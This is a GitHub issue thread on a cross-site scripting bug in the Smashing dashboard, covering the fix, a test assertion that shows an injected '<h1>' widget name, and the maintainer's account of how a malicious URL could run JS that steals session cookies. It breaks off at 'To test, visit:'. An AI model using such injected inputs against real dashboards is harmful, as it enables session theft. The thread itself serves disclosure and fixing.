Closed gebhardtr closed 3 years ago
@gebhardtr looks like it's rack-test
that's unhappy with the URL in the get
call. I've applied the suggestion from this issue and it fixed the build on this PR.
Also confirmed that the test with this change, in the master
branch was failing.
Minitest::Assertion: --- expected
+++ actual
@@ -1,2 +1 @@
-# encoding: ASCII-8BIT
-"Drats! Unable to find a widget file named: nowidget-<h1> to render."
+"Drats! Unable to find a widget file named: nowidget-<h1> to render."
Let me know if you agree with the fix. Also, I'll prepare a release once it's merged, and will incldue this as a security bug. Let me know if you are OK with your name appearing as reporter for the bug :)
Thanks! Bruno
Absolutely! Thank you very much, @kinow.
Fix released.
The easiest way to exploit this issue is probably by sending a malicious URL to someone with access to the dashboard. That way the executed code could be used to run malicious JS in Smashing that could be used to steal session cookies or other sensitive data.
Most browsers protect against attacks like this, but there is no guarantee a browser or extension would prevent it. However, secure cookies, and cookies in other domains would not leak to this session, making it harder for an attacker to steal them.
I think the risk is greater if the dashboard is running on localhost
for development, or maybe in a subdomain like dashboards.domain.com, and somehow there are cookies from domain.com available to the session.
Thanks again for reporting it @gebhardtr . CVE-2021-35440 will be updated and published soon.
Bruno
To test, visit: